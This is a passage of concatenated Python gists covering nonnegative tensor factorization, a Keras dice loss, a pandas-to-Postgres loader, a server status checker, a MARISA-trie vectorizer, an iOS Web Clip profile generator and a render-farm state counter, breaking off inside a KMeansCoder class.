user.set_password(self.cleaned_data['<PASSWORD>'])
if commit:
user.save()
return user
```
#### File: hard-gists/7719245/snippet.py
```python
import numpy as np
from numpy import zeros, ones, diff, kron, tile, any, all, linalg
import numpy.linalg as nla
import time
from sktensor import ktensor
def find(condition):
"Return the indices where ravel(condition) is true"
res, = np.nonzero(np.ravel(condition))
return res
def normalEqComb(AtA, AtB, PassSet=None):
""" Solve many systems of linear equations using combinatorial grouping.
<NAME> and <NAME>, J. Chemometrics 2004; 18: 441-450
Parameters
----------
AtA : numpy.array, shape (n,n)
AtB : numpy.array, shape (n,k)
Returns
-------
Z : numpy.array, shape (n,k) - solution
"""
if AtB.size == 0:
Z = np.zeros([])
elif (PassSet == None) or np.all(PassSet):
Z = nla.solve(AtA, AtB)
else:
Z = np.zeros(AtB.shape)
if PassSet.shape[1] == 1:
if np.any(PassSet):
cols = PassSet.nonzero()[0]
Z[cols] = nla.solve(AtA[np.ix_(cols, cols)], AtB[cols])
else:
#
# Both _column_group_loop() and _column_group_recursive() work well.
# Based on preliminary testing,
# _column_group_loop() is slightly faster for tiny k(<10), but
# _column_group_recursive() is faster for large k's.
#
grps = _column_group_recursive(PassSet)
for gr in grps:
cols = PassSet[:, gr[0]].nonzero()[0]
if cols.size > 0:
ix1 = np.ix_(cols, gr)
ix2 = np.ix_(cols, cols)
#
# scipy.linalg.cho_solve can be used instead of numpy.linalg.solve.
# For small n(<200), numpy.linalg.solve appears faster, whereas
# for large n(>500), scipy.linalg.cho_solve appears faster.
# Usage example of scipy.linalg.cho_solve:
# Z[ix1] = sla.cho_solve(sla.cho_factor(AtA[ix2]),AtB[ix1])
#
Z[ix1] = nla.solve(AtA[ix2], AtB[ix1])
return Z
def _column_group_recursive(B):
""" Given a binary matrix, find groups of the same columns
with a recursive strategy
Parameters
----------
B : numpy.array, True/False in each element
Returns
-------
A list of arrays - each array contain indices of columns that are the same.
"""
initial = np.arange(0, B.shape[1])
return [a for a in column_group_sub(B, 0, initial) if len(a) > 0]
def column_group_sub(B, i, cols):
vec = B[i][cols]
if len(cols) <= 1:
return [cols]
if i == (B.shape[0] - 1):
col_trues = cols[vec.nonzero()[0]]
col_falses = cols[(-vec).nonzero()[0]]
return [col_trues, col_falses]
else:
col_trues = cols[vec.nonzero()[0]]
col_falses = cols[(-vec).nonzero()[0]]
after = column_group_sub(B, i + 1, col_trues)
after.extend(column_group_sub(B, i + 1, col_falses))
return after
def nnlsm_activeset(A, B, overwrite=0, isInputProd=0, init=None):
"""
Nonnegativity Constrained Least Squares with Multiple Righthand Sides
using Active Set method
This function solves the following problem: given A and B, find X such that
minimize || AX-B ||_F^2 where X>=0 elementwise.
Reference:
<NAME> and <NAME>,
Solving Least Squares Problems,
Society for Industrial and Applied Mathematics, 1995
<NAME> and <NAME>,
Fast Algorithm for the Solution of Large-scale
Non-negativity-constrained Least Squares Problems,
J. Chemometrics 2004; 18: 441-450
Based on the Matlab version written by <NAME> (<EMAIL>)
School of Computational Science and Engineering,
Georgia Institute of Technology
Parameters
----------
A : input matrix (m x n) (by default),
or A'*A (n x n) if isInputProd==1
B : input matrix (m x k) (by default),
or A'*B (n x k) if isInputProd==1
overwrite : (optional, default:0)
if turned on, unconstrained least squares solution is computed
in the beginning
isInputProd : (optional, default:0)
if turned on, use (A'*A,A'*B) as input instead of (A,B)
init : (optional) initial value for X
Returns
-------
X : the solution (n x k)
Y : A'*A*X - A'*B where X is the solution (n x k)
"""
if isInputProd:
AtA = A
AtB = B
else:
AtA = A.T.dot(A)
AtB = A.T.dot(B)
n, k = AtB.shape
MAX_ITER = n * 5
# set initial feasible solution
if overwrite:
X = normalEqComb(AtA, AtB)
PassSet = (X > 0).copy()
NotOptSet = any(X < 0)
elif init is not None:
X = init
X[X < 0] = 0
PassSet = (X > 0).copy()
NotOptSet = ones((1, k), dtype=np.bool)
else:
X = zeros((n, k))
PassSet = zeros((n, k), dtype=np.bool)
NotOptSet = ones((1, k), dtype=np.bool)
Y = zeros((n, k))
if (~NotOptSet).any():
Y[:, ~NotOptSet] = AtA.dot(X[:, ~NotOptSet]) - AtB[:, ~NotOptSet]
NotOptCols = find(NotOptSet)
bigIter = 0
while NotOptCols.shape[0] > 0:
bigIter = bigIter + 1
# set max_iter for ill-conditioned (numerically unstable) case
if ((MAX_ITER > 0) & (bigIter > MAX_ITER)):
break
Z = normalEqComb(AtA, AtB[:, NotOptCols], PassSet[:, NotOptCols])
Z[abs(Z) < 1e-12] = 0 # for numerical stability.
InfeaSubSet = Z < 0
InfeaSubCols = find(any(InfeaSubSet, axis=0))
FeaSubCols = find(all(~InfeaSubSet, axis=0))
if InfeaSubCols.shape[0] > 0: # for infeasible cols
ZInfea = Z[:, InfeaSubCols]
InfeaCols = NotOptCols[InfeaSubCols]
Alpha = zeros((n, InfeaSubCols.shape[0]))
Alpha[:] = np.inf
ij = np.argwhere(InfeaSubSet[:, InfeaSubCols])
i = ij[:, 0]
j = ij[:, 1]
InfeaSubIx = np.ravel_multi_index((i, j), Alpha.shape)
if InfeaCols.shape[0] == 1:
InfeaIx = np.ravel_multi_index((i,
InfeaCols * ones((len(j), 1),
dtype=int)),
(n, k))
else:
InfeaIx = np.ravel_multi_index((i, InfeaCols[j]), (n, k))
Alpha.ravel()[InfeaSubIx] = X.ravel()[InfeaIx] / \
(X.ravel()[InfeaIx] - ZInfea.ravel()[InfeaSubIx])
minVal, minIx = np.min(Alpha, axis=0), np.argmin(Alpha, axis=0)
Alpha[:, :] = kron(ones((n, 1)), minVal)
X[:, InfeaCols] = X[:, InfeaCols] + \
Alpha * (ZInfea - X[:, InfeaCols])
IxToActive = np.ravel_multi_index((minIx, InfeaCols), (n, k))
X.ravel()[IxToActive] = 0
PassSet.ravel()[IxToActive] = False
if FeaSubCols.shape[0] > 0: # for feasible cols
FeaCols = NotOptCols[FeaSubCols]
X[:, FeaCols] = Z[:, FeaSubCols]
Y[:, FeaCols] = AtA.dot(X[:, FeaCols]) - AtB[:, FeaCols]
Y[abs(Y) < 1e-12] = 0 # for numerical stability.
NotOptSubSet = (Y[:, FeaCols] < 0) & ~PassSet[:, FeaCols]
NewOptCols = FeaCols[all(~NotOptSubSet, axis=0)]
UpdateNotOptCols = FeaCols[any(NotOptSubSet, axis=0)]
if UpdateNotOptCols.shape[0] > 0:
minIx = np.argmin(Y[:, UpdateNotOptCols] * \
~PassSet[:, UpdateNotOptCols], axis=0)
idx = np.ravel_multi_index((minIx, UpdateNotOptCols), (n, k))
PassSet.ravel()[idx] = True
NotOptSet.T[NewOptCols] = False
NotOptCols = find(NotOptSet)
return X, Y
def nnlsm_blockpivot(A, B, isInputProd=0, init=None):
"""
Nonnegativity Constrained Least Squares with Multiple Righthand Sides
using Block Principal Pivoting method
This function solves the following problem: given A and B, find X such that
minimize || AX-B ||_F^2 where X>=0 elementwise.
Reference:
<NAME> and <NAME>. Fast Nonnegative Matrix Factorization:
An Activeset-like Method and Comparisons.
SIAM Journal on Scientific Computing, 33(6), pp. 3261-3281, 2011.
Based on the Matlab version written by <NAME> (<EMAIL>)
School of Computational Science and Engineering,
Georgia Institute of Technology
Parameters
----------
A : input matrix (m x n) (by default),
or A'*A (n x n) if isInputProd==1
B : input matrix (m x k) (by default),
or A'*B (n x k) if isInputProd==1
overwrite : (optional, default:0)
if turned on, unconstrained least squares solution is computed
in the beginning
isInputProd : (optional, default:0)
if turned on, use (A'*A,A'*B) as input instead of (A,B)
init : (optional) initial value for X
Returns
-------
X : the solution (n x k)
Y : A'*A*X - A'*B where X is the solution (n x k)
"""
if isInputProd:
AtA = A
AtB = B
else:
AtA = A.T.dot(A)
AtB = A.T.dot(B)
n, k = AtB.shape
MAX_BIG_ITER = n * 5
# set initial feasible solution
X = zeros((n, k))
if init is None:
Y = - AtB
PassiveSet = zeros((n, k), dtype=np.bool)
else:
PassiveSet = (init > 0).copy()
X = normalEqComb(AtA, AtB, PassiveSet)
Y = AtA.dot(X) - AtB
# parameters
pbar = 3
P = zeros((1, k))
P[:] = pbar
Ninf = zeros((1, k))
Ninf[:] = n + 1
NonOptSet = (Y < 0) & ~PassiveSet
InfeaSet = (X < 0) & PassiveSet
NotGood = (np.sum(NonOptSet, axis=0) + \
np.sum(InfeaSet, axis=0))[np.newaxis, :]
NotOptCols = NotGood > 0
bigIter = 0
while find(NotOptCols).shape[0] > 0:
bigIter = bigIter + 1
# set max_iter for ill-conditioned (numerically unstable) case
if ((MAX_BIG_ITER > 0) & (bigIter > MAX_BIG_ITER)):
break
Cols1 = NotOptCols & (NotGood < Ninf)
Cols2 = NotOptCols & (NotGood >= Ninf) & (P >= 1)
Cols3Ix = find(NotOptCols & ~Cols1 & ~Cols2)
if find(Cols1).shape[0] > 0:
P[Cols1] = pbar
NotGood[Cols1]
Ninf[Cols1] = NotGood[Cols1]
PassiveSet[NonOptSet & tile(Cols1, (n, 1))] = True
PassiveSet[InfeaSet & tile(Cols1, (n, 1))] = False
if find(Cols2).shape[0] > 0:
P[Cols2] = P[Cols2] - 1
PassiveSet[NonOptSet & tile(Cols2, (n, 1))] = True
PassiveSet[InfeaSet & tile(Cols2, (n, 1))] = False
if Cols3Ix.shape[0] > 0:
for i in range(Cols3Ix.shape[0]):
Ix = Cols3Ix[i]
toChange = np.max(find(NonOptSet[:, Ix] | InfeaSet[:, Ix]))
if PassiveSet[toChange, Ix]:
PassiveSet[toChange, Ix] = False
else:
PassiveSet[toChange, Ix] = True
Z = normalEqComb(AtA, AtB[:, NotOptCols.flatten()],
PassiveSet[:, NotOptCols.flatten()])
X[:, NotOptCols.flatten()] = Z[:]
X[abs(X) < 1e-12] = 0 # for numerical stability.
Y[:, NotOptCols.flatten()] = AtA.dot(X[:, NotOptCols.flatten()]) - \
AtB[:, NotOptCols.flatten()]
Y[abs(Y) < 1e-12] = 0 # for numerical stability.
# check optimality
NotOptMask = tile(NotOptCols, (n, 1))
NonOptSet = NotOptMask & (Y < 0) & ~PassiveSet
InfeaSet = NotOptMask & (X < 0) & PassiveSet
NotGood = (np.sum(NonOptSet, axis=0) +
np.sum(InfeaSet, axis=0))[np.newaxis, :]
NotOptCols = NotGood > 0
return X, Y
def getGradient(X, F, nWay, r):
grad = []
for k in range(nWay):
ways = range(nWay)
ways.remove(k)
XF = X.uttkrp(F, k)
# Compute the inner-product matrix
FF = ones((r, r))
for i in ways:
FF = FF * (F[i].T.dot(F[i]))
grad.append(F[k].dot(FF) - XF)
return grad
def getProjGradient(X, F, nWay, r):
pGrad = []
for k in range(nWay):
ways = range(nWay)
ways.remove(k)
XF = X.uttkrp(F, k)
# Compute the inner-product matrix
FF = ones((r, r))
for i in ways:
FF = FF * (F[i].T.dot(F[i]))
grad = F[k].dot(FF) - XF
grad[~((grad < 0) | (F[k] > 0))] = 0.
pGrad.append(grad)
return pGrad
class anls_asgroup(object):
def initializer(self, X, F, nWay, orderWays):
F[orderWays[0]] = zeros(F[orderWays[0]].shape)
FF = []
for k in range(nWay):
FF.append((F[k].T.dot(F[k])))
return F, FF
def iterSolver(self, X, F, FF_init, nWay, r, orderWays):
# solve NNLS problems for each factor
for k in range(nWay):
curWay = orderWays[k]
ways = range(nWay)
ways.remove(curWay)
XF = X.uttkrp(F, curWay)
# Compute the inner-product matrix
FF = ones((r, r))
for i in ways:
FF = FF * FF_init[i] # (F[i].T.dot(F[i]))
ow = 0
Fthis, temp = nnlsm_activeset(FF, XF.T, ow, 1, F[curWay].T)
F[curWay] = Fthis.T
FF_init[curWay] = (F[curWay].T.dot(F[curWay]))
return F, FF_init
class anls_bpp(object):
def initializer(self, X, F, nWay, orderWays):
F[orderWays[0]] = zeros(F[orderWays[0]].shape)
FF = []
for k in range(nWay):
FF.append((F[k].T.dot(F[k])))
return F, FF
def iterSolver(self, X, F, FF_init, nWay, r, orderWays):
for k in range(nWay):
curWay = orderWays[k]
ways = range(nWay)
ways.remove(curWay)
XF = X.uttkrp(F, curWay)
# Compute the inner-product matrix
FF = ones((r, r))
for i in ways:
FF = FF * FF_init[i] # (F[i].T.dot(F[i]))
Fthis, temp = nnlsm_blockpivot(FF, XF.T, 1, F[curWay].T)
F[curWay] = Fthis.T
FF_init[curWay] = (F[curWay].T.dot(F[curWay]))
return F, FF_init
def getStopCriterion(pGrad, nWay, nr_grad_all):
retVal = np.sum(np.linalg.norm(pGrad[i], 'fro') ** 2
for i in range(nWay))
return np.sqrt(retVal) / nr_grad_all
def getRelError(X, F_kten, nWay, nr_X):
error = nr_X ** 2 + F_kten.norm() ** 2 - 2 * F_kten.innerprod(X)
return np.sqrt(max(error, 0)) / nr_X
def nonnegative_tensor_factorization(X, r, method='anls_bpp',
tol=1e-4, stop_criterion=1,
min_iter=20, max_iter=200, max_time=1e6,
init=None, orderWays=None):
"""
Nonnegative Tensor Factorization (Canonical Decomposition / PARAFAC)
Based on the Matlab version written by <NAME> (<EMAIL>)
School of Computational Science and Engineering,
Georgia Institute of Technology
This software implements nonnegativity-constrained low-rank approximation
of tensors in PARAFAC model. Assuming that a k-way tensor X and target rank
r are given, this software seeks F1, ... , Fk by solving the following
problem:
minimize
|| X- sum_(j=1)^r (F1_j o F2_j o ... o Fk_j) ||_F^2 +
G(F1, ... , Fk) + H(F1, ..., Fk)
where
G(F1, ... , Fk) = sum_(i=1)^k ( alpha_i * ||Fi||_F^2 ),
H(F1, ... , Fk) = sum_(i=1)^k ( beta_i sum_(j=1)^n || Fi_j ||_1^2 ).
such that
Fi >= 0 for all i.
To use this software, it is necessary to first install scikit_tensor.
Reference:
Fast Nonnegative Tensor Factorization with an Active-set-like Method.
<NAME> and <NAME>.
In High-Performance Scientific Computing: Algorithms and Applications,
Springer, 2012, pp. 311-326.
Parameters
----------
X : tensor' object of scikit_tensor
Input data tensor.
r : int
Target low-rank.
method : string, optional
Algorithm for solving NMF. One of the following values:
'anls_bpp' 'anls_asgroup' 'hals' 'mu'
See above paper (and references therein) for the details
of these algorithms.
Default is 'anls_bpp'.
tol : float, optional
Stopping tolerance. Default is 1e-4.
If you want to obtain a more accurate solution,
decrease TOL and increase MAX_ITER at the same time.
min_iter : int, optional
Minimum number of iterations. Default is 20.
max_iter : int, optional
Maximum number of iterations. Default is 200.
init : A cell array that contains initial values for factors Fi.
See examples to learn how to set.
Returns
-------
F : a 'ktensor' object that represent a factorized form of a tensor.
Examples
--------
F = nonnegative_tensor_factorization(X, 5)
F = nonnegative_tensor_factorization(X, 10, tol=1e-3)
F = nonnegative_tensor_factorization(X, 7, init=Finit, tol=1e-5)
"""
nWay = len(X.shape)
if orderWays is None:
orderWays = np.arange(nWay)
# set initial values
if init is not None:
F_cell = init
else:
Finit = [np.random.rand(X.shape[i], r) for i in range(nWay)]
F_cell = Finit
grad = getGradient(X, F_cell, nWay, r)
nr_X = X.norm()
nr_grad_all = np.sqrt(np.sum(np.linalg.norm(grad[i], 'fro') ** 2
for i in range(nWay)))
if method == "anls_bpp":
method = anls_bpp()
elif method == "anls_asgroup":
method = anls_asgroup()
else:
raise Exception("Unknown method")
# Execute initializer
F_cell, FF_init = method.initializer(X, F_cell, nWay, orderWays)
tStart = time.time()
if stop_criterion == 2:
F_kten = ktensor(F_cell)
rel_Error = getRelError(X, ktensor(F_cell), nWay, nr_X)
if stop_criterion == 1:
pGrad = getProjGradient(X, F_cell, nWay, r)
SC_PGRAD = getStopCriterion(pGrad, nWay, nr_grad_all)
# main iterations
for iteration in range(max_iter):
cntu = True
F_cell, FF_init = method.iterSolver(X, F_cell,
FF_init, nWay, r, orderWays)
F_kten = ktensor(F_cell)
if iteration >= min_iter:
if time.time() - tStart > max_time:
cntu = False
else:
if stop_criterion == 1:
pGrad = getProjGradient(X, F_cell, nWay, r)
SC_PGRAD = getStopCriterion(pGrad, nWay, nr_grad_all)
if SC_PGRAD < tol:
cntu = False
elif stop_criterion == 2:
prev_rel_Error = rel_Error
rel_Error = getRelError(X, F_kten, nWay, nr_X)
SC_DIFF = np.abs(prev_rel_Error - rel_Error)
if SC_DIFF < tol:
cntu = False
else:
rel_Error = getRelError(X, F_kten, nWay, nr_X)
if rel_Error < 1:
cntu = False
if not cntu:
break
return F_kten
def main():
from numpy.random import rand
# -----------------------------------------------
# Creating a synthetic 4th-order tensor
# -----------------------------------------------
N1 = 20
N2 = 25
N3 = 30
N4 = 30
R = 10
# Random initialization
np.random.seed(42)
A_org = np.random.rand(N1, R)
A_org[A_org < 0.4] = 0
B_org = rand(N2, R)
B_org[B_org < 0.4] = 0
C_org = rand(N3, R)
C_org[C_org < 0.4] = 0
D_org = rand(N4, R)
D_org[D_org < 0.4] = 0
X_ks = ktensor([A_org, B_org, C_org, D_org])
X = X_ks.totensor()
# -----------------------------------------------
# Tentative initial values
# -----------------------------------------------
A0 = np.random.rand(N1, R)
B0 = np.random.rand(N2, R)
C0 = np.random.rand(N3, R)
D0 = np.random.rand(N4, R)
Finit = [A0, B0, C0, D0]
# -----------------------------------------------
# Uncomment only one of the following
# -----------------------------------------------
X_approx_ks = nonnegative_tensor_factorization(X, R)
# X_approx_ks = nonnegative_tensor_factorization(X, R,
# min_iter=5, max_iter=20)
#
# X_approx_ks = nonnegative_tensor_factorization(X, R,
# method='anls_asgroup')
#
# X_approx_ks = nonnegative_tensor_factorization(X, R,
# tol=1e-7, max_iter=300)
#
# X_approx_ks = nonnegative_tensor_factorization(X, R,
# init=Finit)
# -----------------------------------------------
# Approximation Error
# -----------------------------------------------
X_approx = X_approx_ks.totensor()
X_err = (X - X_approx).norm() / X.norm()
print "Error:", X_err
if __name__ == "__main__":
main()
```
#### File: hard-gists/7793e2058c5c9dacb5212c0ac0b18a8a/snippet.py
```python
from keras import backend as K
def dice_coef(y_true, y_pred, smooth=1):
"""
Dice = (2*|X & Y|)/ (|X|+ |Y|)
= 2*sum(|A*B|)/(sum(A^2)+sum(B^2))
ref: https://arxiv.org/pdf/1606.04797v1.pdf
"""
intersection = K.sum(K.abs(y_true * y_pred), axis=-1)
return (2. * intersection + smooth) / (K.sum(K.square(y_true),-1) + K.sum(K.square(y_pred),-1) + smooth)
def dice_coef_loss(y_true, y_pred):
return 1-dice_coef(y_true, y_pred)
# Test
y_true = np.array([[0,0,1,0],[0,0,1,0],[0,0,1.,0.]])
y_pred = np.array([[0,0,0.9,0],[0,0,0.1,0],[1,1,0.1,1.]])
r = dice_coef_loss(
K.theano.shared(y_true),
K.theano.shared(y_pred),
).eval()
print('dice_coef_loss',r)
r = keras.objectives.binary_crossentropy(
K.theano.shared(y_true),
K.theano.shared(y_pred),
).eval()
print('binary_crossentropy',r)
print('binary_crossentropy_scaled',r/r.max())
# TYPE |Almost_right |half right |all_wrong
# dice_coef_loss [ 0.00355872 0.40298507 0.76047904]
# binary_crossentropy [ 0.0263402 0.57564635 12.53243514]
```
#### File: hard-gists/77a4640bb5fcd1e7f038/snippet.py
```python
import psycopg2
from basiclogger import pyLogger
#from datetime import datetime
from pandas import DataFrame
from sqlalchemy import create_engine
FILENAME = 'dataframetopostgres.log'
class Df2Pg:
"""Puts the data in the DataFrame in a Postgres database
"""
class ReadFaker:
""" This could be extended to include the index column optionally. Right now the index
is not inserted
"""
def __init__(self, data):
self.iter = list(data.itertuples())
def readline(self, size=None):
try:
prop = self.iter.pop(0)
line = prop[1:] # element 0 is the index
row = '\t'.join(x if isinstance(x, str) else str(x) for x in line) + '\n'
# in my case all strings in line are unicode objects.
except IndexError:
return ''
else:
return row
read = readline
def __init__(self, df, user, password, host, port, databasename, table, columns=None, logname=FILENAME):
""" Gets:
df - the dataframe
table - the table name
conn_str - psycopg2 connection string
columns - list with field names
example:
Df2Pg(df, user, pass, host, port, dbname, 's_schema.t_table', ['field1','field2'])
"""
self.logger = pyLogger(logname, 'INFO')
conn_str = 'postgres://{}:{}@{}:{}/{}'.format(user, password, host, port, databasename)
self.__insert(df, table, conn_str, columns)
def __insert(self, df, table, conn_str, columns=None):
#time1 = datetime.now()
close_con = False
inserted_rows = df.shape[0]
data = self.ReadFaker(df)
con = psycopg2.connect(conn_str)
try:
curs = con.cursor()
# self.logger.log.debug('inserting %s entries into %s ...' % (inserted_rows, table))
if columns is not None:
curs.copy_from(data, table, null='nan', columns=[col for col in columns])
else:
curs.copy_from(data, table, null='nan')
con.commit()
curs.close()
if close_con:
con.close()
except psycopg2.Error as e:
self.logger.log.error(e.pgerror)
self.logger.log.error(e.pgcode)
con.rollback()
if close_con:
con.close()
raise e
#time2 = datetime.now()
# self.logger.log.debug(time2 - time1)
self.logger.close()
return inserted_rows
class Pg2Df():
"""Converts a pg database query into a Pandas DataFrame"""
def __init__(self, user, password, host, port, databasename, sql, logname=FILENAME):
self.logger = pyLogger(logname, 'INFO')
self.__insert(user, password, host, port, databasename, sql)
def __insert(self, user, password, host, port, databasename, sql):
"""Creates the engine, sends the SQL retrieves the DataFrame"""
try:
connstring = 'postgres://{}:{}@{}:{}/{}'.format(user, password, host, port, databasename)
engine = create_engine(connstring, echo=False, implicit_returning=False)
rs = engine.execute(sql)
d = rs.fetchall()
h = list(rs.keys())
self.dtf = DataFrame.from_records(d, columns=h)
engine.dispose()
except Exception as e:
self.logger.log.error('Error recuperando de la base de datos')
self.logger.log.error(e)
raise e
self.logger.close()
return self.dtf
```
#### File: hard-gists/780379/snippet.py
```python
import urllib
import urllib2
import socket
from google.appengine.api import urlfetch
from google.appengine.api.urlfetch import DownloadError
from google.appengine.ext import db
from models import Status, Service, Event
from datetime import datetime, timedelta, date
results = {}
servers = [
{
"service": "a_server",
"url": "http://aserver.com"
},
{
"service": "another_server",
"url": "http://anotherserver.com"
}
]
def serverisup (service):
# Create a new event with the given status and given service
service = Service.get_by_slug(service)
status = Status.get_by_slug("up")
e = Event(service=service, status=status, message="The server is responding.")
e.put()
def serverisdown (service):
# Create a new event with the given status and given service
service = Service.get_by_slug(service)
status = Status.get_by_slug("down")
e = Event(service=service, status=status, message="The server could not be reached")
e.put()
def check(service,url):
print "Checking " + service + " (" + url + ")..."
try:
results[service] = urlfetch.fetch(url, headers = {'Cache-Control' : 'max-age=30'}, deadline=30 )
except urlfetch.Error:
serverisdown(service)
except DownloadError:
serverisdown(service)
else:
if results[service].status_code == 500:
serverisdown(service)
else:
serverisup(service)
for row in servers:
check(row['service'],row['url'])
```
#### File: hard-gists/7814472/snippet.py
```python
import marisa_trie
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
# hack to store vocabulary in MARISA Trie
class _MarisaVocabularyMixin(object):
def fit_transform(self, raw_documents, y=None):
super(_MarisaVocabularyMixin, self).fit_transform(raw_documents)
self._freeze_vocabulary()
return super(_MarisaVocabularyMixin, self).fit_transform(raw_documents, y)
def _freeze_vocabulary(self):
if not self.fixed_vocabulary_:
self.vocabulary_ = marisa_trie.Trie(self.vocabulary_.keys())
self.fixed_vocabulary_ = True
del self.stop_words_
class MarisaCountVectorizer(_MarisaVocabularyMixin, CountVectorizer):
pass
class MarisaTfidfVectorizer(_MarisaVocabularyMixin, TfidfVectorizer):
def fit(self, raw_documents, y=None):
super(MarisaTfidfVectorizer, self).fit(raw_documents)
self._freeze_vocabulary()
return super(MarisaTfidfVectorizer, self).fit(raw_documents, y)
```
#### File: hard-gists/7870550/snippet.py
```python
import plistlib
import BaseHTTPServer
import webbrowser
import uuid
from io import BytesIO
import Image
import photos
import notification
import console
class ConfigProfileHandler (BaseHTTPServer.BaseHTTPRequestHandler):
config = None
def do_GET(s):
s.send_response(200)
s.send_header('Content-Type', 'application/x-apple-aspen-config')
s.end_headers()
plist_string = plistlib.writePlistToString(ConfigProfileHandler.config)
s.wfile.write(plist_string)
def log_message(self, format, *args):
pass
def run_server(config):
ConfigProfileHandler.config = config
server_address = ('', 0)
httpd = BaseHTTPServer.HTTPServer(server_address, ConfigProfileHandler)
sa = httpd.socket.getsockname()
webbrowser.open('safari-http://localhost:' + str(sa[1]))
httpd.handle_request()
notification.schedule('Tap "Install" to add the shortcut to your homescreen.', 1.0)
def main():
console.alert('Shortcut Generator', 'This script adds a "Webclip" shortcut to your homescreen. The shortcut can be used to open a web page in full-screen mode, or to launch a custom URL (e.g. a third-party app). You\'ll be asked for a title, a URL, and an icon (from your camera roll).', 'Continue')
label = console.input_alert('Shortcut Title', 'Please enter a short title for the homescreen icon.', '', 'Continue')
if not label:
return
url = console.input_alert('Shortcut URL', 'Please enter the full URL that the shortcut should launch.', '', 'Continue')
if not url:
return
icon = photos.pick_image()
if not icon:
return
console.show_activity('Preparing Configuration profile...')
data_buffer = BytesIO()
icon.save(data_buffer, 'PNG')
icon_data = data_buffer.getvalue()
unique_id = uuid.uuid4().urn[9:].upper()
config = {'PayloadContent': [{'FullScreen': True,
'Icon': plistlib.Data(icon_data), 'IsRemovable': True,
'Label': label, 'PayloadDescription': 'Configures Web Clip',
'PayloadDisplayName': label,
'PayloadIdentifier': 'com.omz-software.shortcut.' + unique_id,
'PayloadOrganization': 'omz:software',
'PayloadType': 'com.apple.webClip.managed',
'PayloadUUID': unique_id, 'PayloadVersion': 1,
'Precomposed': True, 'URL': url}],
'PayloadDescription': label,
'PayloadDisplayName': label + ' (Shortcut)',
'PayloadIdentifier': 'com.omz-software.shortcut.' + unique_id,
'PayloadOrganization': 'omz:software',
'PayloadRemovalDisallowed': False, 'PayloadType':
'Configuration', 'PayloadUUID': unique_id, 'PayloadVersion': 1}
console.hide_activity()
run_server(config)
if __name__ == '__main__':
main()
```
#### File: hard-gists/7880c101557297beeccda05978aeb278/snippet.py
```python
import af
cmd = af.Cmd()
def isSysJob(job):
return job['st'] == 0
## Jobs ##
joblist = cmd.getJobList()
job_state_counters = {}
job_count = 0
for job in joblist:
if isSysJob(job):
continue
job_count += 1
for s in job['state'].split():
job_state_counters[s] = job_state_counters.get(s, 0) + 1
print("Out of %d jobs:" % job_count)
print(" * %d are running" % job_state_counters.get('RUN', 0))
print(" * %d have error" % job_state_counters.get('ERR', 0))
print(" * %d are skipped" % job_state_counters.get('SKP', 0))
print(" * %d are off" % job_state_counters.get('OFF', 0))
print(" * %d are ready" % job_state_counters.get('RDY', 0))
print(" * %d are done" % job_state_counters.get('DON', 0))
# Note that the sum may exceed the total number of jobs because a job can have
# several states
print("")
## Renders ##
renderlist = cmd.renderGetList()
render_state_counts = {}
for render in renderlist:
for s in render['state'].split():
render_state_counts[s] = render_state_counts.get(s, 0) + 1
print("Out of %d renders:" % len(renderlist))
print(" * %d are online" % render_state_counts.get('ONL', 0))
print(" * %d are offline" % render_state_counts.get('OFF', 0))
print(" * %d are nimby" % render_state_counts.get('NBY', 0))
print(" * %d are running" % render_state_counts.get('RUN', 0))
print(" * %d are dirty" % render_state_counts.get('DRT', 0))
# Note that the sum may exceed the total number of renders because a render can
# have several states
```
#### File: hard-gists/7948151/snippet.py
```python
import numpy as np
from sklearn.decomposition import PCA
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.cluster import KMeans
from sklearn.metrics.pairwise import euclidean_distances
class KMeansCoder(BaseEstimator, TransformerMixin):
"""K-means based dictionary learning
The fit method receives an array of signals, whitens them using
a PCA transform and run a KMeans algorithm to extract the patch
cluster centers.
The input is then correlated with each individual "patch-center"
treated as a convolution kernel. The transformation can be done
using various sparse coding methods, tresholding or the triangle
k-means non-linearity.
This estimator only implements the unsupervised feature extraction
part of the referenced paper. Image classification can then be
performed by training a linear SVM model on the output of this
estimator.
Parameters
----------
n_atoms: int,
number of centers extracted by the kmeans algorithm
whiten: boolean, optional: default True
perform a whitening PCA on the data at feature extraction time
n_components: int, optional: default None
number of components to keep after whitening individual samples
max_iter: int, default 100
maximum number of iterations to run the k-means algorithm
n_init, int, default 1
number of times to initialize the k-means algorithm in order to
avoid convergence to local optima
n_prefit: int, default 5
dimension of reduced curriculum space in which to prefit the k-means
algorithm for increased performance.
This is used only when `whiten=True`.
tol: float, default 1e-4
tolerance for numerical errors
local_contrast: boolean, optional: default True
perform local contrast normalization on the extracted patch
verbose: bool, default False
whether to display verbose output
transform_algorithm: {'lasso_lars', 'lasso_cd', 'lars', 'omp', 'threshold'}
Algorithm used to transform the data.
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than alpha from
the projection X.T * Y
transform_n_nonzero_coefs: int, 0.1 * n_features by default
Number of nonzero coefficients to target in each column of the
solution. This is only used by `algorithm='lars'` and `algorithm='omp'`
and is overridden by `alpha` in the `omp` case.
transform_alpha: float, 1. by default
If `algorithm='lasso_lars'` or `algorithm='lasso_cd'`, `alpha` is the
penalty applied to the L1 norm.
If `algorithm='threshold'`, `alpha` is the absolute value of the
threshold below which coefficients will be squashed to zero.
If `algorithm='omp'`, `alpha` is the tolerance parameter: the value of
the reconstruction error targeted. In this case, it overrides
`n_nonzero_coefs`.
split_sign: bool, default False
whether to split the transformed feature vectors into positive and
negative components, such that the downstream classification algorithms
can assign different weights depending on the sign
n_jobs: int,
number of parallel jobs to run
Attributes
----------
components_: array of shape n_atoms, n_features
centers extracted by k-means from the patch space
Reference
---------
An Analysis of Single-Layer Networks in Unsupervised Feature Learning
<NAME>, <NAME> and <NAME>. In NIPS*2010 Workshop on
Deep Learning and Unsupervised Feature Learning.
http://robotics.stanford.edu/~ang/papers/nipsdlufl10-AnalysisSingleLayerUnsupervisedFeatureLearning.pdf
"""
def __init__(self, n_atoms, whiten=True, n_components=None,
max_iter=100, n_init=1, n_prefit=5, tol=1e-4,
local_contrast=True, n_drop_components=0, verbose=False,
transform_algorithm='omp', transform_n_nonzero_coefs=None,
transform_alpha=None, split_sign=False, n_jobs=1):
self.n_atoms = n_atoms
